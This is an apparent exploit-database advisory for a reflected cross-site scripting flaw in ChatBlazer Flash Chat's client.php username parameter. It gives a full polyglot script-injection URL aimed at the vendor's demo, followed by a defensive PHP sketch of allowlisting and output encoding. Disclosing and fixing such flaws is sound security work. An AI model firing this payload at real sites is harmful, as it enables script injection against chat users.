ChatBlazer Flash Chat suffers from a cross site scripting vulnerability.
# Exploit Title: ChatBlazer Flash Chat Cross Site Scripting
# Date: 19.04.2012
# Author: Sony
# Software Link: www.chatblazer.com/
# Web Browser : Mozilla Firefox
# Blog : https://st2tea.blogspot.com
# PoC:
https://st2tea.blogspot.com/2012/04/chatblazer-flash-chat-cross-site.html
.................................................................
Well, ChatBlazer has a cross site scripting vulnerability.
We can use the demo to show it (simple example); the payload goes in the username parameter of client.php:
https://demo.chatblazer.net/cb8.5/client.php?username=%27;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//\%27;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//%22;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//\%22;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29%3C/SCRIPT%3E&password=&roomid=1009&config=config.php%3Fembed%3D0
https://1.bp.blogspot.com/-7YzWcOWVNe4/T4_vKoTi96I/AAAAAAAABAE/NWNAfZTijDI/s1600/chat.JPG
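
A defensive sketch of the server-side fix, added here as an example and not taken from ChatBlazer's code. It assumes client.php writes the username parameter into both HTML markup and an inline script block; the function names valid_username, html_ctx and js_ctx are hypothetical, and it needs the PHP 7.3+ CLI.

```php
<?php
// Added example, not ChatBlazer code. Assumption: client.php places the
// "username" request parameter into both HTML markup and an inline <script>.

// Allowlist check: accept only a plain chat nickname, reject everything else.
function valid_username(string $u): bool {
    return preg_match('/\A[A-Za-z0-9_.-]{1,32}\z/', $u) === 1;
}

// HTML text/attribute context: encode < > & " and '.
function html_ctx(string $u): string {
    return htmlspecialchars($u, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Inline JavaScript string context: emit a JSON string literal with
// <, >, &, ' and " written as \uXXXX, so neither the string nor the
// enclosing <script> element can be closed early.
function js_ctx(string $u): string {
    return json_encode($u, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS
        | JSON_HEX_QUOT | JSON_THROW_ON_ERROR);
}

// Constructed sample: shortened form of the username value in the PoC URL above.
$poc = "';alert(String.fromCharCode(79,117,114))//--></SCRIPT>\">'><SCRIPT>alert(1)</SCRIPT>";

foreach (['guest_42', $poc] as $u) {
    printf("input   : %s\n", $u);
    printf("valid   : %s\n", valid_username($u) ? 'yes' : 'no (reject with HTTP 400)');
    printf("html ctx: %s\n", html_ctx($u));
    printf("js ctx  : var username = %s;\n\n", js_ctx($u));
}

// After encoding, no raw quote or angle bracket is left in either output.
assert(strpbrk(html_ctx($poc), "<>\"'") === false);
assert(strpbrk(substr(js_ctx($poc), 1, -1), "<>\"'") === false);
```

The allowlist alone would stop this request, but encoding at every output point is what keeps other parameters and stored values from reaching the page unescaped.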